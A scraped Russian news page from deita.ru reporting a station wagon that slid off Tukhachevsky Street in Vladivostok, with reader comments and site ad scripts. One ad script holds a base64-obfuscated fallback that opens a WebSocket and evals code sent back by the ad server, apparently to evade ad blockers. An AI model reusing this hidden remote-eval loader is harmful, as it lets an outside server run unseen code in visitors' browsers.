            <svg version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 95.481 95.481" xml:space="preserve">
                <g>
                    <path d="M43.041,67.254c-7.402-0.772-14.076-2.595-19.79-7.064c-0.709-0.556-1.441-1.092-2.088-1.713
			c-2.501-2.402-2.753-5.153-0.774-7.988c1.693-2.426,4.535-3.075,7.489-1.682c0.572,0.27,1.117,0.607,1.639,0.969
			c10.649,7.317,25.278,7.519,35.967,0.329c1.059-0.812,2.191-1.474,3.503-1.812c2.551-0.655,4.93,0.282,6.299,2.514
			c1.564,2.549,1.544,5.037-0.383,7.016c-2.956,3.034-6.511,5.229-10.461,6.761c-3.735,1.448-7.826,2.177-11.875,2.661
			c0.611,0.665,0.899,0.992,1.281,1.376c5.498,5.524,11.02,11.025,16.5,16.566c1.867,1.888,2.257,4.229,1.229,6.425
			c-1.124,2.4-3.64,3.979-6.107,3.81c-1.563-0.108-2.782-0.886-3.865-1.977c-4.149-4.175-8.376-8.273-12.441-12.527
			c-1.183-1.237-1.752-1.003-2.796,0.071c-4.174,4.297-8.416,8.528-12.683,12.735c-1.916,1.889-4.196,2.229-6.418,1.15
			c-2.362-1.145-3.865-3.556-3.749-5.979c0.08-1.639,0.886-2.891,2.011-4.014c5.441-5.433,10.867-10.88,16.295-16.322
			C42.183,68.197,42.518,67.813,43.041,67.254z"/>
                    <path d="M47.55,48.329c-13.205-0.045-24.033-10.992-23.956-24.218C23.67,10.739,34.505-0.037,47.84,0
			c13.362,0.036,24.087,10.967,24.02,24.478C71.792,37.677,60.889,48.375,47.55,48.329z M59.551,24.143
			c-0.023-6.567-5.253-11.795-11.807-11.801c-6.609-0.007-11.886,5.316-11.835,11.943c0.049,6.542,5.324,11.733,11.896,11.709
			C54.357,35.971,59.573,30.709,59.551,24.143z"/>
                </g>
            </svg>
        </a></div>
    </li>
    <li class="mailru">
        <div>
            <a target="_blank" class="share-links__a" title="Мой Мир" href="http://connect.mail.ru/share?url=http%3A%2F%2Fdeita.ru%2Fnews%2Fneudachno-zavershaet-god-vladivostokskij-avtolyubitel%2F&title=%D0%9D%D0%B5%D1%83%D0%B4%D0%B0%D1%87%D0%BD%D0%BE%20%D0%B7%D0%B0%D0%B2%D0%B5%D1%80%D1%88%D0%B0%D0%B5%D1%82%20%D0%B3%D0%BE%D0%B4%20%D0%B2%D0%BB%D0%B0%D0%B4%D0%B8%D0%B2%D0%BE%D1%81%D1%82%D0%BE%D0%BA%D1%81%D0%BA%D0%B8%D0%B9%20%D0%B0%D0%B2%D1%82%D0%BE%D0%BB%D1%8E%D0%B1%D0%B8%D1%82%D0%B5%D0%BB%D1%8C&image_url=/media/images/______bUwqJa6.2e16d0ba.fill-1200x630-c100.jpg">
            <svg  id="Layer_1" version="1.1" viewBox="0 0 512 512" xml:space="preserve" xmlns="http://www.w3.org/2000/svg" xmlns:cc="http://creativecommons.org/ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd" xmlns:svg="http://www.w3.org/2000/svg"><defs id="defs12"/><g id="g5274"><rect height="512" id="rect2987" rx="64" ry="64" style="fill-opacity:1;fill-rule:nonzero;stroke:none" width="512" x="0" y="5.6843419e-014"/><path d="m 325.08023,254.16735 c -2.27055,-44.21506 -35.10145,-70.80947 -74.74837,-70.80947 h -1.49271 c -45.75131,0 -71.12043,35.9769 -71.12043,76.84766 0,45.75277 30.69113,74.65689 70.94771,74.65689 44.86825,0 74.37896,-32.87444 76.51434,-71.75258 l -0.10083,-8.9425 z M 249.06141,143.77992 c 30.56941,0 59.31572,13.51355 80.41569,34.67344 v 0.0789 c 0,-10.1542 6.83707,-17.81281 16.32463,-17.81281 l 2.40265,-0.0161 c 14.83791,0 17.89376,14.04663 17.89376,18.49011 l 0.0672,157.91815 c -1.04965,10.34343 10.67237,15.68341 17.16706,9.04303 25.36152,-26.06002 55.69376,-133.97115 -15.76452,-196.48095 -66.59585,-58.291684 -155.95549,-48.69003 -203.47876,-15.93125 -50.52505,34.84324 -82.846827,111.9703 -51.44697,184.40458 34.23344,79.00115 132.18414,102.5653 190.40359,79.05815 29.47929,-11.89766 43.09031,27.94902 12.47443,40.97143 C 269.2643,457.87699 140.49957,455.88877 80.353263,351.69281 39.713683,281.34277 41.867183,157.55899 149.65819,93.430316 232.10858,44.355874 340.82166,57.938441 406.3724,126.39644 c 68.51948,71.56628 64.51614,205.58696 -2.30796,257.68275 -30.28271,23.6752 -75.26202,0.64267 -74.97824,-33.85059 l -0.30789,-11.27602 c -21.08477,20.92125 -49.14793,33.12827 -79.71734,33.12827 -60.39852,0 -113.54541,-53.13038 -113.54541,-113.53943 0,-60.99006 53.14689,-114.76179 113.54541,-114.76179 l 0,0" id="path24_3_" style="fill:white;"/></g></svg>
        </a></div>
    </li>
    <li class="whatsup">
        <div><a name="whatsapp-share-link" class="share-links__a" title="Whatsapp" href="whatsapp://send?text=%D0%9D%D0%B5%D1%83%D0%B4%D0%B0%D1%87%D0%BD%D0%BE%20%D0%B7%D0%B0%D0%B2%D0%B5%D1%80%D1%88%D0%B0%D0%B5%D1%82%20%D0%B3%D0%BE%D0%B4%20%D0%B2%D0%BB%D0%B0%D0%B4%D0%B8%D0%B2%D0%BE%D1%81%D1%82%D0%BE%D0%BA%D1%81%D0%BA%D0%B8%D0%B9%20%D0%B0%D0%B2%D1%82%D0%BE%D0%BB%D1%8E%D0%B1%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%20http%3A%2F%2Fdeita.ru%2Fnews%2Fneudachno-zavershaet-god-vladivostokskij-avtolyubitel%2F" data-action="share/whatsapp/share" target="_blank" >
            <i class="fa fa-whatsapp"></i></a></div>
    </li>
</ul>
</div>
        
        <article  class="article-content small-10 large-11 columns">

            <div class="article-title">
                
                    
                        <div class="category"><a href="/category/%D0%BF%D1%80%D0%BE%D0%B8%D1%81%D1%88%D0%B5%D1%81%D1%82%D0%B2%D0%B8%D1%8F/" >Происшествия</a></div>
                    
                        <div class="category"><a href="/category/%D0%B0%D0%B2%D1%82%D0%BE/" >Авто</a></div>
                    
                        <div class="category"><a href="/category/%D0%BF%D1%80%D0%B8%D0%BC%D0%BE%D1%80%D1%81%D0%BA%D0%B8%D0%B9-%D0%BA%D1%80%D0%B0%D0%B9/" >Приморье</a></div>
                    
                
                <div class="date">31 Декабрь 2017, 22:28</div>
                <h1>Неудачно завершает год владивостокский автолюбитель</h1>
                <div class="article-intro">
                    <p></p>
                </div>
            </div>
            <div class="article-body" id="article-420653">
                
                    
                        <div class="img-container">
                        <figure class="article-main-image">
                            <img alt="ДТП Тухачевского" height="600" src="/media/images/______bUwqJa6.2e16d0ba.fill-900x600.jpg" width="900">

                            
                        </figure>
                        
                            <div class="image-source">
                                Источник изображения: dpskontrol_125rus
                            </div>
                        
                        </div>
                    
                
                
                <div class="article-main-part">
                    
                                <div class="paragraph">
    <div class="rich-text"><p>На улице Тухачевского универсал ушел под откос, сообщает «Deita.ru». Фото дорожно-транспортного
происшествия было опубликовано в популярном паблике dpskontrol_125rus.</p>

<p>«Вот так чистят дороги у нас. Тухачевского», - пишет автор
поста.</p>

<p>«Или вот так ездят у нас?» - комментирует один из
пользователей. «Если водитель олень, то какие дороги разницы нет», - мудро
замечает другой комментатор.</p>

<p>Ранее «Deita.ru» сообщало о
<a href="/news/avtobus-stolb-i-eskudik-nashli-drug-druga-vo-vladivostoke/">дорожно-транспортном происшествии в районе остановки общественного транспорта «Краевая
больница»</a>.  Здесь рейсовый автобус вмял Suzuki Escudo в столб. «Эскудик»
покидает место аварии на эвакуаторе.</p>

<p>Дмитрий Санников</p></div>
</div>
                    
                </div>
            </div>
         <div class="ads-wrapper">
                
         </div>
            


    <h4 class="center">Комментарии для данной новости запрещены</h4>



                    <div>
                   <div id="smi_teaser_10989">
                        <center>
                            <a href="https://24smi.info/?utm_source=informer_10989">
                                Агрегатор новостей 24СМИ</a>    </center>
                    </div>
                    <script type="text/JavaScript" encoding="utf8">
                      (function() {
                         var sm = document.createElement("script");
                         sm.type = "text/javascript";
                         sm.async = true;
                         sm.src = "//jsn.24smi.net/9/e/10989.js";
                         var s = document.getElementsByTagName("script")[0];
                         s.parentNode.insertBefore(sm, s);})();
                    </script>
                    </div>


        </article>
         


<div class="ads-container" style="padding: 0 5px" >
<ul class='ads-group m-ads_article_bottom m-ads_663x100'>
		<li class='b-ads m-ads_flash m-ads_27' style="width: 663px; height: 100px;">
			
				
                				<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'
					codebase='http://fpdownload.adobe.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0'
					width='663' height='100'>
					<param name='movie' value='/media/documents/DRSK_work_663%D1%85100_v06_fin_%D0%A0%D0%B0%D0%B1%D0%BE%D1%82%D1%8B.swf' />
					<param name='quality' value='high'>
					<param name='play' value='true'>
					<param name='loop' value='true'>
					<param name='wmode' value='transparent'>
					<embed src='/media/documents/DRSK_work_663%D1%85100_v06_fin_%D0%A0%D0%B0%D0%B1%D0%BE%D1%82%D1%8B.swf'
						quality='high'
						bgcolor='#d0f'
						width='663'
						height='100'
						name='banner_27'
						type='application/x-shockwave-flash'
						play='true'
						loop='true'
						wmode='transparent'
						pluginspage='http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash'
					>
					</embed>
                                </object>
			

		</li><!-- b-banner -->

</ul><!-- b-banner-group -->
</div>


    </div>

    </div>
    <div class="article-right columns">
     <div class="ads-wrapper show-for-medium">
        
     </div>
     <div class="ads-wrapper show-for-medium">
        
     </div>
    <div class="column-card">
        
        <div class="read-more">
            <h4><svg height="13" width="13"><polygon points="13,0 0,0 0,13" style="fill:#e31e24;" /></svg> Видеорепортаж</h4>
        </div>
        <div class="last_video">
            <a href="/video/o-zdravoohranenii-sahalinskoj-oblasti/">
               <img alt="Сахалин здравоохранение Видео" height="150" src="/media/images/___________17.2e16d0ba.fill-250x150.jpg" width="250">
                <div class="video-icon">
                    <i class="fi-play-video"></i>
                </div>
            </a>

        </div>
    </div>
    
        
        
    

    <div class="column-card" style="padding: 0">
        <div id="unit_89580"><a href="http://smi2.ru/">Новости партнеров</a></div>
                <script type="text/javascript" charset="utf-8">
			  (function() {
			    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
			    sc.src = '//smi2.ru/data/js/89580.js'; sc.charset = 'utf-8';
			    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
			  }());
    </script>
    </div>

    </div>
</div>
<div class="lentainform" style="display:block!important;">
  <style>
    .rti {width:100%;height:240px;}
    @media (max-width: 767px) {
      .rti {height:480px;}
    }
    @media (max-width: 479px) {
      .rti {height:960px;}
    }
  </style>
  <script id="r34509" type="text/javascript">
    (function() {
        var worker34509,
            tickerID = 34509,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);

        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-ru.redtram.com/n4p/0/34/ticker_34509.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker34509.postMessage(data);
                }

                worker34509 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker34509.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker34509.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
</div>

</div>


            <div><a class="infinite-more-link" href="/news/tarakan-v-kafe-kitajskoj-kuhni-vozmutil-vladivostokcev/?al" id="next">
                <i class='fa fa-refresh fa-spin'></i> Другие новости</a></div>











        </main>

        
            

<footer class="">

    <div class="footer-main off-canvas position-bottom"  id="offCanvasBottom1" data-off-canvas>
            <button type="button" class="button footer-button" data-toggle="offCanvasBottom1">info
                
            </button>
    <div class="row">
        <div class="medium-4 large-3 columns">
            <ul>
                <li><a href="/advert/">Для рекламодателей</a></li>
                <li><a href="/contacts/">Контакты</a></li>
                <li><a href="/about/">О нас</a></li>
                <li><a href="None">Вакансии</a></li>
                <li><a href="/about_uk/">About us</a></li>
                <li><a href="None">통신사에 대해서</a></li>
                
                
                
                <li><a href="/archive/2018/01/01/">Архив</a></li>
                 

            </ul>
        </div>
        <div class="medium-8 large-6 columns">
            <h3 class="footer_about_us">О нас</h3>
            <p class="footer_about_us">На данном сайте распространяется информация (материалы) электронного периодического издания «DEITA.RU» - свидетельство Эл № ФС 77-69854 от 29 мая 2017 года, выдано Федеральной службой по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) – действует на основании Закона о СМИ.
                <br>Кроме того, на  сайте распространяется информация (материалы) электронного периодического издания «DEITA.RU» - свидетельство Эл № ФС 77-69854 от 29 мая 2017 года, выдано Федеральной службой по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) – действует на основании Закона о СМИ.
                <br>© ООО «ДЕЙТА.РУ» 2001–2017 гг
                <br>При любом использовании текстовых материалов с данного сайта гиперссылка на источник обязательна
            </p>
        </div>
        <div class="large-3 columns show-for-large">
            <h3>Подписаться на новости</h3>
            <div id="mc_embed_signup">
                <form action="" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" novalidate>
                    <div id="mc_embed_signup_scroll">
                        <input type="email" value="" name="EMAIL" class="email" id="mce-EMAIL" placeholder="email" required>
                        <!-- real people should not fill this in and expect good things - do not remove this or risk form bot signups-->
                        <div style="position: absolute; left: -5000px;"><input type="text" name="b_3489214029024915bb546afc7_f619618f07" tabindex="-1" value=""></div>
                        <div class="clear">
                            <input type="submit" value="Подписаться" name="subscribe" id="mc-embedded-subscribe" class="button">
                        </div>
                        </div>
                    </form>
</div>
        </div>
    </div>

<!--
    <div class="created-by">
        <p>Разработка сайта: <a href="mailto:nimagt@gmail.com">nimagt@gmail.com</a></p>
    </div>
-->

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-84640422-1', 'auto');
  ga('send', 'pageview');

</script>

<script async src="https://cdn.onthe.io/io.js/nMooxytmjhzO"></script>

<!--Openstat-->
<span id="openstat1"></span>
<script type="text/javascript">
var openstat = { counter: 1, image: 91, color: "828282", next: openstat };
(function(d, t, p) {
var j = d.createElement(t); j.async = true; j.type = "text/javascript";
j.src = ("https:" == p ? "https:" : "http:") + "//openstat.net/cnt.js";
var s = d.getElementsByTagName(t)[0]; s.parentNode.insertBefore(j, s);
})(document, "script", document.location.protocol);
</script>


<!--LiveInternet counter--><!--LiveInternet counter--><script type="text/javascript">
document.write("<a href='//www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t50.4;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet' "+
"border='0' width='31' height='31'><\/a>")
//--></script><!--/LiveInternet-->


<!-- Yandex.Metrika counter -->
 <script type="text/javascript"> (function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter22778989 = new Ya.Metrika({ id:22778989, clickmap:true, trackLinks:true, accurateTrackBounce:true }); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/javascript"; s.async = true; s.src = "https://mc.yandex.ru/metrika/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks"); </script> <noscript><div><img src="https://mc.yandex.ru/watch/22778989" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->



<!-- AdEngine Code START -->
<!-- Владивосток Новости -->
<!-- Line -->
    <script language="JavaScript">
    function k_ph(p){document.write('<div id="kph'+p+'" style="display:none"><\/div>');}
    function k_c(p){document.write('<div style="visibility:hidden;position:absolute"><iframe id="k_c'+p+'" width=1 height=1 marginwidth=0 marginheight=0 scrolling=no frameborder=0><\/iframe><\/div>');}
    function k_getCode(n,p,s){
    var d;
    if(n<10){try{if(document.all && !window.opera){d = window.frames['k_c'+p].document;}
    else if(document.getElementById){d=document.getElementById('k_c'+p).contentDocument;}}catch(e){;}
    if(d){d.write('<scr'+'ipt type="text/javascript">var kphid="kph'+p+'";<\/scr'+'ipt>');
    d.write('<scr'+'ipt type="text/javascript" src="'+s+'"><\/scr'+'ipt>');}
    else {setTimeout('k_getCode('+(++n)+','+p+',"'+s+'")', 100);}
    }}
    if (typeof(document.referrer) != 'undefined') {afReferrer = escape(document.referrer);}
    else {afReferrer = '';}
    var addate = new Date();
    if ('undefined' == typeof(kav_cn)){ var kav_cn = 0; } else {++kav_cn;}
    k_ph(kav_cn); k_c(kav_cn);
    k_getCode(1,kav_cn,'http://b.kavanga.ru/exp?sid=3006&bt=9&bn=1&bc=1&ct=2&pr=' + Math.round(Math.random()*100000) + '&pt=b&pd=' + addate.getDate() + '&pw=' + addate.getDay() + '&pv=' + addate.getHours() + '&prr=' + afReferrer);
    </script>
    </div>
</footer>
        


        


        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
        <script src="https://unpkg.com/imagesloaded@4/imagesloaded.pkgd.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.imagesloaded/3.2.0/imagesloaded.pkgd.min.js"></script>
        <script async type="text/javascript" src="http://new.mediametrics.ru/js/radio.mediametrics.widget-open-source.js" onload="init_radiowidget()"></script>
        <script src="https://code.createjs.com/createjs-2015.11.26.min.js"></script>
        <script type="text/javascript" src="/static/CACHE/js/5670cb3f234c.js"></script>
        <script type="text/javascript" src="/static/js/infinite-scroll.js"></script>
        
    
            
        

        <script src="/static/hitcount/jquery.postcsrf.js"></script>
    <script>
		// When you use default selectors
		// $('#contentsWrapper').cleverInfiteScroll();
		// When you use custom selectors

		$('#article-list').cleverInfiniteScroll({
			contentsWrapperSelector: '#article-feed',
			contentSelector: '.article-page',
			nextSelector: '#next',

		});
	</script>



    </body>
</html>
